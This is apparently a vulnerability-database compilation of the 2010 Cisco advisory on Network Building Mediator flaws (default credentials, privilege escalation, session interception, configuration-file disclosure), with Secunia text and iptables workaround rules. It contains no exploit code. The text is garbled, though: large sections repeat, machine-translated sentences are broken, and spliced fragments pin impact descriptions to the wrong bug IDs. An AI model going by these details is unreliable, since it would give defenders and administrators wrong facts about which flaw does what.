such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
| VAR-201005-0905 | CVE-2010-0595 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 has a default password for the administrative user account and unspecified other accounts, which makes it easier for remote attackers to obtain privileged access, aka Bug ID CSCtb83495. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The problem is Bug ID : CSCtb83495 It is a problem.Access rights may be obtained by a third party. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. There are several security vulnerabilities in Cisco Network Building Mediator, as follows: - Default Authentication Credentials (CVE-2010-0595): Multiple predefined users on the device, including administrator user accounts using default authentication information, any network access device Users can log in to the control system as an administrator.-Privilege Escalation (CVE-2010-0596, CVE-2010-0597): Vulnerability allows unauthorized users to read and modify device configurations, malicious users must be able to successfully authenticate, but do not require administrator privileges Or modify the device configuration if you know the administrator to verify the credentials. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): Operator workstation Cisco Network Building Mediator did not protect unauthorized interception of sessions, malicious users could intercept sessions, obtain arbitrary authentication information, and use this information to control devices. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Attackers can perform attacks and read configuration files via XML RPC or XML RCP over the HTTPS protocol.
An attacker can exploit this issue to gain unauthorized administrative access to the affected device. Successful exploits will result in the complete compromise of the affected device. Remote attackers can easily gain access. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. All Mediator Framework software releases prior to 3.1.1 are
affected by all vulnerabilities listed in this security advisory.
This table provides information about affected software releases:
+---------------------------------------+
| Cisco Bug | Affects Software |
| ID | Releases |
|-------------+-------------------------|
| CSCtb83495 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83607 | 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83618 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83631 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83505 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83512 | 1.5.1, 2.2, 3.0.8 |
+---------------------------------------+
Vulnerable Products
+------------------
Users can determine the version of the Mediator Framework running on
a device by logging into the device. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0904 | CVE-2010-0596 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Mediator Framework 2.2 before 2.2.1.dev.1 and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 allows remote authenticated users to read or modify the device configuration, and gain privileges, via a (1) HTTP or (2) HTTPS request, aka Bug ID CSCtb83607. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): Operator workstation Cisco Network Building Mediator did not protect unauthorized interception of sessions, malicious users could intercept sessions, obtain arbitrary authentication information, and use this information to control devices. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Attackers can perform attacks and read configuration files via XML RPC or XML RCP over the HTTPS protocol. This issue is tracked by Cisco Bug ID CSCtb83607.
An authenticated attacker can exploit this issue to read and modify configuration settings, gaining elevated privileges. This may lead to a full compromise of the affected computer or aid in further attacks. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this
vulnerability can be exploited to reload the affected device. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
